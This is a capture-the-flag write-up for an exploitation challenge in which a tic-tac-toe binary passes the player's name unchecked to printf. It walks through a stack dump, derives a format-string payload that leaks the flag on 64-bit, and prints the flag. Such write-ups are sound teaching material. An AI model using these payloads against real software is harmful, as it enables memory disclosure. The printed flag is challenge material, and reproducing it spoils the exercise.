## Difficulty 50/100 | MEDIUM Simple format string attack, this is not groundbreaking stuff. ## Category Exploitation ## How To Solve There is a format string vulnerability in the `print_win_message` function. The name the user inputs at the beginning of the game is printed here using `printf` without any validation. This means we can leak data from the stack. It also happens that the flag is on the stack. To leak the flag we are going to use the `%s` format string specifier. The problem is that there are a couple of values on the stack before that, for example the stack looks like this right before the `printf` call: ``` 00:0000│ rsp 0x7fffffffd250 —▸ 0x5555555596b0 ◂— '%x%x%x%s' 01:0008│-018 0x7fffffffd258 —▸ 0x55555555670b ◂— 'Xx_TicTacToesKing69_xX' 02:0010│-010 0x7fffffffd260 —▸ 0x555555559720 —▸ 0x55555555670b ◂— 'Xx_TicTacToesKing69_xX' 03:0018│-008 0x7fffffffd268 —▸ 0x55555555667f ◂— 'IGCTF{REDACTED}' 04:0020│ rbp 0x7fffffffd270 —▸ 0x7fffffffd2b0 —▸ 0x7fffffffd2e0 —▸ 0x7fffffffd380 —▸ 0x7fffffffd3e0 ◂— ... 05:0028│+008 0x7fffffffd278 —▸ 0x555555555b64 (play_game+240) ◂— mov rax, qword ptr [rbp - 0x18] 06:0030│+010 0x7fffffffd280 —▸ 0x555555559740 —▸ 0x5555555596b0 ◂— '%x%x%x%s' 07:0038│+018 0x7fffffffd288 —▸ 0x555555559720 —▸ 0x55555555670b ◂— 'Xx_TicTacToesKing69_xX' ``` So we need to pop off, 3 64 bit ints before we reach the flag. Which means we would need the following payload `%p%p%p%s`. This would work on a 32 bit machine but since this is a 64 bit binary, the first 6 arguments are passed via register. This means we need to "pop off" an additional 5 arguments (the first argument is the format string itself) giving us the final payload string: `%p%p%p%p%p%p%p%p%s` ## Flag IGCTF{W3ll_y0u_st1ll_l0st_BuT_at_l3ast_yoU_g0t_th3_fl4g}